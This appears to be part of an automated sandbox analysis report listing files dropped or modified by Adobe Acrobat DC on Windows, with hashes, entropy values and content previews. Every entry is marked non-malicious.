                                                                                            Preview:2024/12/19-06:50:45.522 ab0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:50:45.524 ab0 Recovering log #3.2024/12/19-06:50:45.524 ab0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):335
                                                                                            Entropy (8bit):5.165775352961603
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7Vgq2PCHhJ2nKuAl9Ombzo2jMGIFUt8ODZZmw+ODzkwOCHhJ2nKuAl9Ombzo2jM4:7VgvBHAa8uFUt8Od/+Ov56HAa8RJ
                                                                                            MD5:01B17001662C1174DA7222FB775AECF1
                                                                                            SHA1:A13213AE3E55CEE9672DD946F07FF1753C06A12F
                                                                                            SHA-256:2CCAD0516A02A6F95118C064912072C2D632BF6673202308E67B474CB9D82168
                                                                                            SHA-512:5D73FC02551DE4AF767361692AEB4D0CE1BF75D457F3638C05F2E2BA1253548A60F15F12E1CE795AA6D2A4FA21DC918F29D5DC7726627E5B421A737ED221BCA1
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:50:45.522 ab0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:50:45.524 ab0 Recovering log #3.2024/12/19-06:50:45.524 ab0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\82db079a-9714-45da-aba9-e80081f6d167.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):475
                                                                                            Entropy (8bit):4.963247713778661
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                                            MD5:D46529E824E6E834D0D750C5560C136C
                                                                                            SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                                            SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                                            SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\8506d03d-9786-4122-8203-4c7cf7141a9c.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:modified
                                                                                            Size (bytes):475
                                                                                            Entropy (8bit):4.968905002143363
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqa7sBdOg2Hpcaq3QYiub6P7E4TX:Y2sRdsx8dMHQ3QYhbS7n7
                                                                                            MD5:6373D8355DD0F7D96A64F50BE49FD16C
                                                                                            SHA1:E715AFEAFA86CFE7128AF994C5CAC9C905912FC2
                                                                                            SHA-256:8585690C753072FF225DAB19998E243A65648E863D8362B59209C7C43295CB12
                                                                                            SHA-512:95A1AE5F77BD091E99CA2E4871D9EAB917A9A1521C8B31A4DD0D91C67FFF8BC35794565931A428B619BD934B39980A69734152497D0D0A2C22C22BFFF0CB8BC8
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379169058618221","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":585373},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):475
                                                                                            Entropy (8bit):4.963247713778661
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                                            MD5:D46529E824E6E834D0D750C5560C136C
                                                                                            SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                                            SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                                            SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF71115f.TMP (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):475
                                                                                            Entropy (8bit):4.963247713778661
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                                            MD5:D46529E824E6E834D0D750C5560C136C
                                                                                            SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                                            SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                                            SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):3878
                                                                                            Entropy (8bit):5.23779918122259
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bIoBne:S43C4mS7fFi0KFYDjr3LWO3V3aw+bIge
                                                                                            MD5:7995A95F3A1C1303B2A78350BA1A0F48
                                                                                            SHA1:B693D3E28A568BF0A89504F0637985A10659227C
                                                                                            SHA-256:0B7E1A87D21719492FE7572EFB57B8EA775D76862DC5DF31EBB9DB2DA3EEF15F
                                                                                            SHA-512:D50E8CD6C1296751CBAC5563A737864C44108011A07AE7C4F602DA5CD3AAD40207FF52EE314CDAAA8E1BC587E299E71A31087387DE7B5FAA6F855109394DF885
                                                                                            Malicious:false
                                                                                            Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):323
                                                                                            Entropy (8bit):5.183005114704604
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7nEgq2PCHhJ2nKuAl9OmbzNMxIFUt8OvBZmw+ONWkwOCHhJ2nKuAl9OmbzNMFLJ:7nEgvBHAa8jFUt8OZ/+Oc56HAa84J
                                                                                            MD5:A3606BDE9D5D845510AE3B341CF605FF
                                                                                            SHA1:4194F23A011FF6445595384ECA0BD54216338BEF
                                                                                            SHA-256:87BF353919EB043AC67774726D6484DA49DAA4FDFDB8DB22BB870E05A30CDD70
                                                                                            SHA-512:21F82C8E0F0F352290A4E52B4E2D80D53102189ED37F0AB0D221D9108F4A8A70557B7D5AE35E05D7BC189C51E140E7D4ECB47BA3C025AA4AB03AF616E393F4B6
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:50:45.901 ab0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:50:45.902 ab0 Recovering log #3.2024/12/19-06:50:45.903 ab0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):323
                                                                                            Entropy (8bit):5.183005114704604
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7nEgq2PCHhJ2nKuAl9OmbzNMxIFUt8OvBZmw+ONWkwOCHhJ2nKuAl9OmbzNMFLJ:7nEgvBHAa8jFUt8OZ/+Oc56HAa84J
                                                                                            MD5:A3606BDE9D5D845510AE3B341CF605FF
                                                                                            SHA1:4194F23A011FF6445595384ECA0BD54216338BEF
                                                                                            SHA-256:87BF353919EB043AC67774726D6484DA49DAA4FDFDB8DB22BB870E05A30CDD70
                                                                                            SHA-512:21F82C8E0F0F352290A4E52B4E2D80D53102189ED37F0AB0D221D9108F4A8A70557B7D5AE35E05D7BC189C51E140E7D4ECB47BA3C025AA4AB03AF616E393F4B6
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:50:45.901 ab0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:50:45.902 ab0 Recovering log #3.2024/12/19-06:50:45.903 ab0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241219115050Z-209.bmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                            Category:dropped
                                                                                            Size (bytes):65110
                                                                                            Entropy (8bit):0.6376462682686903
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                            MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                            SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                            SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                            SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                            Malicious:false
                                                                                            Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:Certificate, Version=3
                                                                                            Category:dropped
                                                                                            Size (bytes):1391
                                                                                            Entropy (8bit):7.705940075877404
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                            Malicious:false
                                                                                            Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                            Category:dropped
                                                                                            Size (bytes):71954
                                                                                            Entropy (8bit):7.996617769952133
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                            Malicious:false
                                                                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):192
                                                                                            Entropy (8bit):2.756901573172974
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:kkFklbGce3b31fllXlE/HT8kvLltNNX8RolJuRdxLlGB9lQRYwpDdt:kKFpb32T8mJNMa8RdWBwRd
                                                                                            MD5:8D213593086FC6A974B632AB71258BF1
                                                                                            SHA1:DC9124769CFAFBD3BA0B0C8AF44F488B5A25A48C
                                                                                            SHA-256:F83FBFAB4784FDF1E94AC692B46A2D4FA93A2F97979BBB9372E89893F74F2D8E
                                                                                            SHA-512:FE7A14500C4FB31D7D33AB953294A41FEC7D7B776D9616FC01B1F1774359459E3C44AB8F6FFF6DFB04DD5BB60A189804CCDB712D39452FE04E44A8EA0CC5E8C0
                                                                                            Malicious:false
                                                                                            Preview:p...... ........(#yC.R..(....................................................... ..........W....J...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):328
                                                                                            Entropy (8bit):3.1382935058119616
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kKd9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:8DnLNkPlE99SNxAhUe/3
                                                                                            MD5:B9632DC9D782B6E71BD91AEE76AEBEC5
                                                                                            SHA1:5724FDABB37A4B73A67AE18FB5BD7868C76A14C0
                                                                                            SHA-256:3EDD21A6C5D3433B31D160D1B92D6E55517D8B3D77E11AE3F59C938D7630EBAA
                                                                                            SHA-512:5D9E2D9A227B29A411DB73969C732CD3412274B0A5FCCF89398C5C068B9B5A1358A1E73564B7DED8ED0243E5916D77AB6E745162AD18E83F71F0B09955404C12
                                                                                            Malicious:false
                                                                                            Preview:p...... .........'sV.R..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):295
                                                                                            Entropy (8bit):5.349687840605552
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJM3g98kUwPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGMbLUkee9
                                                                                            MD5:3FCED705E7B568701918A40F6915B287
                                                                                            SHA1:5A02075424E42436BD46274B08D219CFBC680EC1
                                                                                            SHA-256:E93BD6475DD26A9461CD41503037C33E35179E217F92D986EA980B6D759A8CC5
                                                                                            SHA-512:5F72A979689D2E9629089A28AE60FA96570BDEF01990182865277160E3CF1F4569C3C29C02560EE4E059FE32059F56B71BD1F5A034D5C2FEF4F87823F004F11B
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):294
                                                                                            Entropy (8bit):5.2810718096216
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfBoTfXpnrPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGWTfXcUkee9
                                                                                            MD5:C6EA1202D5B1DD7550669066351189A5
                                                                                            SHA1:809A98878CB0FEB39B74E545708B3D8857BEC7B4
                                                                                            SHA-256:A927CDF0BADBC2FFF3A86D11D3EF8DE07690C8A0897D3D5DDD4B7FB52DD059AB
                                                                                            SHA-512:E8EF0C3716E12CA4CDC8D2E8AC043FAEA11E33FA0ADCE44F7164B896C9ACF1A2361C7D48E9D02FE7A2B61143952C02F6AD3BA99692789FAA9BD395BF7BDB2D5C
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):294
                                                                                            Entropy (8bit):5.260396732460192
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfBD2G6UpnrPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGR22cUkee9
                                                                                            MD5:2662F3DD1317E06FAF609C4A12F74777
                                                                                            SHA1:C784FA53E1A5A92C736D0A92E3D9A4FB8B66CC65
                                                                                            SHA-256:873167AAAB040739274423813C9B8613B813B58F3CA31A7D9B161A66EA790A64
                                                                                            SHA-512:8FC86CCF4CF97FF954611082025513476EEACA9540DBA4D9960854950932318CE81B2CA0D582F03948032620DE30CA93D4F37DE7425A82A3A22D630FFEF01F2D
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):285
                                                                                            Entropy (8bit):5.326156543441667
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfPmwrPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGH56Ukee9
                                                                                            MD5:4BBDBDFFE7C7F322199A2D3C852B2738
                                                                                            SHA1:7814168905449FC76A68FA0FD9DB0E91A4E28C47
                                                                                            SHA-256:F49C3348AF0C7465FB55A1E8FF63520300B5D1B5D5974F9F68BF6EEE78300FF9
                                                                                            SHA-512:8300E591518BE72FAE902F48B0DACEE0936C525C2C327BD06E5C182391B772CC4C86EBBD94BC2C6D2EF376EACF595D73B3842290199162568132B5A26A9180EF
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):1123
                                                                                            Entropy (8bit):5.684094098705642
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Yv6X8AUP62JhHpLgE9cQx8LennAvzBvkn0RCmK8czOCCSO:Yv1A/2JhHhgy6SAFv5Ah8cv/O
                                                                                            MD5:C4CE523EA1DB6C3BA853515519B7E870
                                                                                            SHA1:84E02665237A465459AEC08AD5CFECB3B9ABEA43
                                                                                            SHA-256:732BC60C71BB99A751DF7037D96631FE1EE39E9877D52416247E6C7ECE918B6A
                                                                                            SHA-512:38A04F3ABF79416CC5985212892A6C54402072ECECCE2825C32246D2B0B5BA3E01F3DFAD43501BF66A31DE475DD3DE196676DD58F748B72F94E13BE0420D20D5
                                                                                            Malicious:false
